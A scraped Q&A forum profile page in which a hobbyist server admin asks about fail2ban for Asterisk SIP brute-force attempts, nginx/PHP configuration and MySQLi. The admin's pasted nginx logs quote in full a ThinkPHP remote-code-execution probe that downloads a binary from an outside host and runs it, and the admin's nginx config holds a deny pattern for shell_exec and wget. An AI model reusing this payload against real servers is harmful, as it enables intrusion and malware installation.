• How do I properly install fail2ban on Ubuntu 16.04?

    @fastboot Question author
    wiki.friendlyarm.com/wiki/index.php/ZeroPi
    [Jun 14 18:32:49] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:3801@95.153.108.70>' failed for '47.116.2.134:55228' - Wrong password
    [Jun 14 18:32:50] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 448489382-1057232789-495721129 on non-critical invite transaction.
    [Jun 14 18:32:52] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:267@95.153.108.70>' failed for '47.104.199.253:54371' - Wrong password
    [Jun 14 18:32:54] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:1010@95.153.108.70>' failed for '47.116.2.134:64367' - Wrong password
    [Jun 14 18:32:57] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:268@95.153.108.70>' failed for '47.104.199.253:55770' - Wrong password
    [Jun 14 18:33:00] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:9989@95.153.108.70>' failed for '47.116.2.134:54584' - Wrong password
    [Jun 14 18:33:03] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:269@95.153.108.70>' failed for '47.104.199.253:57160' - Wrong password
    [Jun 14 18:33:04] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 900928925-995863455-1270982707 on non-critical invite transaction.
    [Jun 14 18:33:05] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:103@95.153.108.70>' failed for '47.116.2.134:61801' - Wrong password
    [Jun 14 18:33:08] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:270@95.153.108.70>' failed for '47.104.199.253:60349' - Wrong password
    [Jun 14 18:33:11] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:403@95.153.108.70>' failed for '47.116.2.134:56160' - Wrong password
    [Jun 14 18:33:14] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:271@95.153.108.70>' failed for '47.104.199.253:61743' - Wrong password
    [Jun 14 18:33:19] WARNING[1292]: chan_sip.c:4140 retrans_pkt: Retransmission timeout reached on transmission 865724920-345173970-1732455504 for seqno 2 (Critical Response) -- See https://wiki.asterisk.org/wiki/display/AST/SIP+Retransmissions
    Packet timed out after 32001ms with no response
    [Jun 14 18:33:19] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 1221310584-971346634-449513973 on non-critical invite transaction.
    [Jun 14 18:33:20] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:272@95.153.108.70>' failed for '47.104.199.253:63115' - Wrong password
    [Jun 14 18:33:22] NOTICE[1292][C-00000014]: chan_sip.c:19635 send_check_user_failure_response: Failed to authenticate device <sip:444@95.153.108.70>;tag=330089800 for INVITE, code = -1
    [Jun 14 18:33:22] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:3049@95.153.108.70>' failed for '47.116.2.134:50208' - Wrong password
    [Jun 14 18:33:26] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:273@95.153.108.70>' failed for '47.104.199.253:64659' - Wrong password
    [Jun 14 18:33:28] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:26@95.153.108.70>' failed for '47.116.2.134:63194' - Wrong password
    [Jun 14 18:33:32] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:274@95.153.108.70>' failed for '47.104.199.253:49844' - Wrong password
    [Jun 14 18:33:33] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 1841869371-1500174654-1005709748 on non-critical invite transaction.
    [Jun 14 18:33:34] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:20@95.153.108.70>' failed for '47.116.2.134:59170' - Wrong password
    [Jun 14 18:33:38] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:275@95.153.108.70>' failed for '47.104.199.253:51234' - Wrong password
    [Jun 14 18:33:39] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:301@95.153.108.70>' failed for '47.116.2.134:56838' - Wrong password
    [Jun 14 18:33:43] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:276@95.153.108.70>' failed for '47.104.199.253:52610' - Wrong password
    [Jun 14 18:33:45] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:811@95.153.108.70>' failed for '47.116.2.134:52152' - Wrong password
    [Jun 14 18:33:46] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 33687658-753371463-615339028 on non-critical invite transaction.
    [Jun 14 18:33:49] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:277@95.153.108.70>' failed for '47.104.199.253:54026' - Wrong password
    [Jun 14 18:33:51] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:601@95.153.108.70>' failed for '47.116.2.134:53819' - Wrong password
    [Jun 14 18:33:54] WARNING[1292]: chan_sip.c:4140 retrans_pkt: Retransmission timeout reached on transmission 228731125-517513660-1663896340 for seqno 2 (Critical Response) -- See https://wiki.asterisk.org/wiki/display/AST/SIP+Retransmissions
    Packet timed out after 32000ms with no response
    [Jun 14 18:33:55] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:278@95.153.108.70>' failed for '47.104.199.253:55435' - Wrong password
    [Jun 14 18:33:56] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:4022@95.153.108.70>' failed for '47.116.2.134:64058' - Wrong password
    [Jun 14 18:33:58] NOTICE[1292][C-00000018]: chan_sip.c:19635 send_check_user_failure_response: Failed to authenticate device <sip:444@95.153.108.70>;tag=1719053430 for INVITE, code = -1
    [Jun 14 18:34:00] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 185565220-155413723-1804673829 on non-critical invite transaction.
    [Jun 14 18:34:00] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:279@95.153.108.70>' failed for '47.104.199.253:56845' - Wrong password
    [Jun 14 18:34:02] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:4060@95.153.108.70>' failed for '47.116.2.134:57746' - Wrong password
    [Jun 14 18:34:06] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:280@95.153.108.70>' failed for '47.104.199.253:58262' - Wrong password
    [Jun 14 18:34:07] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:2125@95.153.108.70>' failed for '47.116.2.134:53909' - Wrong password
    [Jun 14 18:34:12] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:281@95.153.108.70>' failed for '47.104.199.253:59665' - Wrong password
    [Jun 14 18:34:13] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:1004@95.153.108.70>' failed for '47.116.2.134:64286' - Wrong password
    [Jun 14 18:34:13] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 745289027-1526549781-2117819593 on non-critical invite transaction.
    [Jun 14 18:34:17] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:282@95.153.108.70>' failed for '47.104.199.253:61065' - Wrong password
    [Jun 14 18:34:18] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:290@95.153.108.70>' failed for '47.116.2.134:54640' - Wrong password
    [Jun 14 18:34:23] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:283@95.153.108.70>' failed for '47.104.199.253:62471' - Wrong password
    [Jun 14 18:34:24] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:102@95.153.108.70>' failed for '47.116.2.134:51909' - Wrong password
    [Jun 14 18:34:27] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 625644818-1078643364-1471235237 on non-critical invite transaction.
    [Jun 14 18:34:29] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:284@95.153.108.70>' failed for '47.104.199.253:63856' - Wrong password
    [Jun 14 18:34:29] NOTICE

    Why isn't my config working?
    root@ZeroPi-Asterisk:~# fail2ban-client status asterisk
    Status for the jail: asterisk
    |- Filter
    |  |- Currently failed: 0
    |  |- Total failed:     0
    |  `- Journal matches:
    `- Actions
       |- Currently banned: 0
       |- Total banned:     0
       `- Banned IP list:
    root@ZeroPi-Asterisk:~#


    The config works: I checked by adding [asterisk1] in [asterisk] to test fail2ban-client status asterisk1, and it worked, then I changed it back. In the main config I looked at [asterisk] and there is no enable there, and I also changed the name, but fail2ban doesn't work.
    root@ZeroPi-Asterisk:~# cat /etc/fail2ban/jail.d/asterisk.conf
    [asterisk]
    enabled = true
    filter = asterisk
    action = iptables-allports[name=ASTERISK, protocol=all]
    logpath = /var/log/asterisk/messages
    maxretry = 2
    findtime = 86400
    bantime = 604800
    root@ZeroPi-Asterisk:~#
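To check what the jail above should have counted, independently of fail2ban, here is an added example (not part of the original post) that extracts failed registrations from chan_sip log lines and applies the same `maxretry`/`findtime` thresholds. The regex, the sample lines, and the year are assumptions made for this example; the regex is not fail2ban's shipped `asterisk` filter.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the chan_sip layout shown above (documentation-range IPs).
SAMPLE_LOG = """\
[Jun 14 18:32:49] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:3801@192.0.2.10>' failed for '198.51.100.7:55228' - Wrong password
[Jun 14 18:32:50] WARNING[1292]: chan_sip.c:4199 retrans_pkt: Timeout on 1-2-3 on non-critical invite transaction.
[Jun 14 18:32:52] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:267@192.0.2.10>' failed for '203.0.113.9:54371' - Wrong password
[Jun 14 18:32:54] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:1010@192.0.2.10>' failed for '198.51.100.7:64367' - Wrong password
[Jun 14 18:33:22] NOTICE[1292][C-00000014]: chan_sip.c:19635 send_check_user_failure_response: Failed to authenticate device <sip:444@192.0.2.10>;tag=1 for INVITE, code = -1
[Jun 16 09:00:00] NOTICE[1292]: chan_sip.c:29029 handle_request_register: Registration from '<sip:268@192.0.2.10>' failed for '203.0.113.9:55770' - Wrong password
"""

# Pattern written for this example only; it is NOT fail2ban's shipped asterisk filter.
FAILED_REGISTER = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d)\] NOTICE\[\d+\](?:\[C-[0-9a-f]+\])?: "
    r"chan_sip\.c:\d+ handle_request_register: Registration from '[^']*' "
    r"failed for '(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+' - Wrong password$"
)


def parse_failures(log_text, year=2021):
    """Return [(timestamp, source_ip)] for failed REGISTER lines.

    The timestamps shown above carry no year, so the caller supplies one (assumed)."""
    failures = []
    for line in log_text.splitlines():
        m = FAILED_REGISTER.match(line.strip())
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            failures.append((ts, m["ip"]))
    return failures


def would_ban(failures, maxretry, findtime):
    """Model of the jail: ban an IP once maxretry failures fall within findtime seconds."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(list)
    banned = {}
    for ts, ip in sorted(failures):
        if ip in banned:
            continue
        recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
        if len(recent[ip]) >= maxretry:
            banned[ip] = ts
    return banned


if __name__ == "__main__":
    hits = parse_failures(SAMPLE_LOG)
    print(len(hits), "failed registrations")
    # maxretry and findtime taken from the jail definition above
    for ip, when in would_ban(hits, maxretry=2, findtime=86400).items():
        print("would ban", ip, "at", when)
```

If a count like this is non-zero on the real file while `fail2ban-client status` reports `Total failed: 0`, the jail is not reading or not matching that file; `fail2ban-regex /var/log/asterisk/messages /etc/fail2ban/filter.d/asterisk.conf` tests the shipped filter directly. The `Journal matches:` line in the status output is what fail2ban prints for a systemd journal backend instead of `File list:`, so the jail's `backend` setting is worth checking.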
  • What kills an SSD?

    @fastboot Question author
    A TeamSpeak server is running on SSD 2, as are NGINX and PHP, and the logs are there too
  • MySQLi in PHP: why an array inside an array?

    @fastboot Question author
    I got confused because I couldn't figure out why I was getting only 1 value from the table, then I found mysqli_fetch_all and got confused here.
    In general, is there a template for all queries? Or is doing it this way wrong?
  • MySQLi in PHP: why an array inside an array?

    @fastboot Question author
    array(3) {
      [0]=>
      array(1) {
        [0]=>
        string(12) "172.30.255.1"
      }
      [1]=>
      array(1) {
        [0]=>
        string(12) "172.30.255.2"
      }
      [2]=>
      array(1) {
        [0]=>
        string(12) "172.30.255.3"
      }
    }
  • Why do I get the local address n.n.n.n.in-addr.arpa via DNS?

    @fastboot Question author
    601d07d9a4912768254860.png Why are PTR queries happening?
  • How or where do I configure the interface IP?

    @fastboot Question author
    Sanes, why do I still get IPv6 even though I seem to have disabled it? 60113909c239c291648111.png
  • How or where do I configure the interface IP?

    @fastboot Question author
    Sanes, I can't figure it out: can I first configure static and dynamic on one interface? Or through /etc/network/interfaces?
  • How or where do I configure the interface IP?

    @fastboot Question author
    cat /etc/network/interfaces
    auto lo
    iface lo inet loopback
  • How or where do I configure the interface IP?

    @fastboot Question author
    Sanes, Ubuntu 16.04.7 LTS 4.14.111
    # uname -a
    Linux ZeroPi-theProsto 4.14.111 #1 SMP Thu Dec 19 15:23:22 CST 2019 armv7l armv7l armv7l GNU/Linux
  • How or where do I configure the interface IP?

    @fastboot Question author
    The stock system is installed, I'm looking at the instructions: https://wiki.friendlyarm.com/wiki/index.php/Use_Ne...
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight,
    2021/01/13 11:44:27 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
    2021/01/13 11:44:27 [debug] 589#589: posix_memalign: 00584A50:256 @16
    2021/01/13 11:44:27 [debug] 589#589: *13 accept: 5.89.124.222:48290 fd:9
    2021/01/13 11:44:27 [debug] 589#589: *13 event timer add: 9: 60000:4213358598
    2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 1
    2021/01/13 11:44:27 [debug] 589#589: *13 epoll add event: fd:9 op:1 ev:80002001
    2021/01/13 11:44:27 [debug] 589#589: *13 post event 005BF8C0
    2021/01/13 11:44:27 [debug] 589#589: *13 delete posted event 005BF8C0
    2021/01/13 11:44:27 [debug] 589#589: *13 http wait request handler
    2021/01/13 11:44:27 [debug] 589#589: *13 malloc: 0059A928:1024
    2021/01/13 11:44:27 [debug] 589#589: *13 posix_memalign: 0059AD30:256 @16
    2021/01/13 11:44:27 [debug] 589#589: *13 recv: fd:9 0 of 1024
    2021/01/13 11:44:27 [info] 589#589: *13 client closed connection while waiting for request, client: 5.89.124.222, server: 0.0.0.0:80
    2021/01/13 11:44:27 [debug] 589#589: *13 close http connection: 9
    2021/01/13 11:44:27 [debug] 589#589: *13 event timer del: 9: 4213358598
    2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 0
    2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059A928
    2021/01/13 11:44:27 [debug] 589#589: *13 free: 00584A50, unused: 8
    2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059AD30, unused: 232
    2021/01/13 11:56:00 [debug] 589#589: post event 005BF860
    2021/01/13 11:56:00 [debug] 589#589: delete posted event 005BF860
    2021/01/13 11:56:00 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
    2021/01/13 11:56:00 [debug] 589#589: posix_memalign: 00584A50:256 @16
    2021/01/13 11:56:00 [debug] 589#589: *14 accept: 86.34.111.230:33013 fd:9
    2021/01/13 11:56:00 [debug] 589#589: *14 event timer add: 9: 60000:4214051446
    2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 1
    2021/01/13 11:56:00 [debug] 589#589: *14 epoll add event: fd:9 op:1 ev:80002001
    2021/01/13 11:56:00 [debug] 589#589: *14 post event 005BF8C0
    2021/01/13 11:56:00 [debug] 589#589: *14 delete posted event 005BF8C0
    2021/01/13 11:56:00 [debug] 589#589: *14 http wait request handler
    2021/01/13 11:56:00 [debug] 589#589: *14 malloc: 0059A928:1024
    2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0059AD30:256 @16
    2021/01/13 11:56:00 [debug] 589#589: *14 recv: fd:9 320 of 1024
    2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 0
    2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0058AD60:4096 @16
    2021/01/13 11:56:00 [debug] 589#589: *14 http process request line
    2021/01/13 11:56:00 [debug] 589#589: *14 http request line: "GET /index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
    2021/01/13 11:56:00 [debug] 589#589: *14 http uri: "/index.php"
    2021/01/13 11:56:00 [debug] 589#589: *14 http args: "s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
    2021/01/13 11:56:00 [debug] 589#589: *14 http exten: "php"
    2021/01/13 11:56:00 [debug] 589#589: *14 http process request header line
    2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Connection: keep-alive"
    2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept-Encoding: gzip, deflate"
    2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept: /"
    2021/01/13 11:56:00 [debug] 589#589: *14 http header: "User-Agent: Uirusu/2.0"
    2021/01/13 11:56:00 [debug] 589#589: *14 http header done
    2021/01/13 11:56:00 [info] 589#589: *14 client sent HTTP/1.1 request without "Host" header while reading client request headers, client: 86.34.111.230, server: vitko-core.ru, request: "GET /index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
    2021/01/13 11:56:00 [debug] 589#589: *14 http finalize request: 400, "/index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'" a:1, c:1
    2021/01/13 11:56:00 [debug] 589#589: *14 event timer del: 9: 4214051446
    2021/01/13 11:56:00 [debug] 589#589: *14 http special response: 400, "/index.php?s=/index/	hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
    2021/01/13 11:56:00 [debug] 589#589: *14 http set discard body
    2021/01/13 11:56:00 [debug] 589#589: *14 xslt filter header
    2021/01/13 11:56:00 [debug] 589#589: *14 HTTP/1.1 400 Bad Request
    Server: nginx/1.10.3 (Ubuntu)
    Date: Wed, 13 Jan 2021 09:56:00 GMT
    Content-Type: text/html
    Content-Length: 182
    Connection: close

    What's wrong here? I'm just looking at this log and trying to understand how it all works. Is a 400 error from nginx good for it or not?
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight, the 400 error: I tried filtering at the nginx level, it works only if I make the request from my own hardware
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight, it triggered once http://vitko-core.ru/dev/log/. Yesterday I checked with curl and everything seemed to work, I cleared the log, and looking now it no longer does
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight, 5ffe8649e8726625775146.jpeg I include this file in index.php
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight,
    root@ZeroPi-WWW:/tmp# cat /etc/nginx/sites-enabled/vitko-core.ru
    # http://vitko-core.ru
    
    server {
        listen 80 default_server;
    
        root /var/www/vitko-core.ru;
    
        index index.php index.html index.htm;
    
        server_name vitko-core.ru www.vitko-core.ru;
    
        #if ($request_uri ~* "call_user_func_array|shell_exec|wget") { return 444;break;}
    
            location / {
                    if ($query_string ~ "call_user_func_array" ) {
                            return 403;
                    }
    
                    try_files $uri $uri/ =404;
            }
    
            location ~ \.php$ {
                    if ( $args ~* "call_user_func_array|shell_exec|wget" ) {
                            return 444;
                    }
                    include snippets/fastcgi-php.conf;
                    fastcgi_pass unix:/run/php/php7.0-fpm.sock;
            }
    }


    I'm looking at the log:
    {"status": "400","ip": "189.111.65.123","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://88.218.16.198/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "Uirusu/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T23:08:40+02:00"}
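For reviewing a JSON access log like the line above for these probes, here is an added example (not part of the original post) that parses each line and reports requests whose decoded path contains the tokens the nginx `if` blocks look for. The sample lines, host name and function names are constructed for this example; the parser handles the `\x09`-style escapes visible in the log line, which strict JSON parsers reject.

```python
import json
import re
from urllib.parse import unquote

# Constructed access-log lines in the JSON layout shown above (documentation-range IPs).
SAMPLE_LINES = [
    r'{"status": "400","ip": "203.0.113.5","host": "example.test","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec","user_agent": "Uirusu/2.0","length": 343}',
    r'{"status": "200","ip": "203.0.113.6","host": "example.test","path": "/index.php?function=call%5Fuser%5Ffunc%5Farray&vars[0]=shell%5Fexec","user_agent": "-","length": 512}',
    r'{"status": "200","ip": "198.51.100.20","host": "example.test","path": "/index.php?page=2","user_agent": "Mozilla/5.0","length": 2048}',
]

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# Same tokens as the nginx `if` blocks above, plus the route name seen in the log.
PROBE_TOKENS = re.compile(r"invokefunction|call_user_func_array|shell_exec|wget", re.I)


def parse_line(line):
    """Parse one log line, tolerating nginx's \\xNN escapes.

    nginx's default log escaping (the only one before escape=json arrived in
    1.11.8) writes bytes such as TAB as \\x09, which strict JSON rejects;
    \\u00NN is the equivalent JSON spelling."""
    return json.loads(HEX_ESCAPE.sub(r"\\u00\1", line))


def find_probes(lines):
    """Return one dict per line whose decoded request path contains a probe token."""
    hits = []
    for line in lines:
        try:
            rec = parse_line(line)
        except json.JSONDecodeError:
            continue  # not a JSON access-log line
        path = unquote(rec.get("path", ""))  # catch percent-encoded spellings too
        tokens = sorted({t.lower() for t in PROBE_TOKENS.findall(path)})
        if tokens:
            hits.append({"ip": rec.get("ip"), "status": rec.get("status"), "tokens": tokens})
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LINES):
        print(hit)
```

The `status` field is kept in each hit because it separates requests nginx rejected outright (the 400 in the debug log above was logged for a missing `Host` header) from ones that went on to normal request processing.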
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight, sorry, I'm a newbie)) I don't understand smart words right away
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    xmoonlight, like, do the check in index.php? I think I got the idea
  • Nginx 1.10: PHP exploit via GET arguments, how do I fix it?

    @fastboot Question author
    A regex filter for all incoming user data
    In what mode is this? On the nginx side? If you can, point me where to look :)
  • Why does PHP $_SERVER['REMOTE_ADDR'] return the provider's GRAY IP address?

    @fastboot Question author
    http://vitko-core.ru:80/ so it's a gray domain then? I didn't understand the first part of the message, nor the second part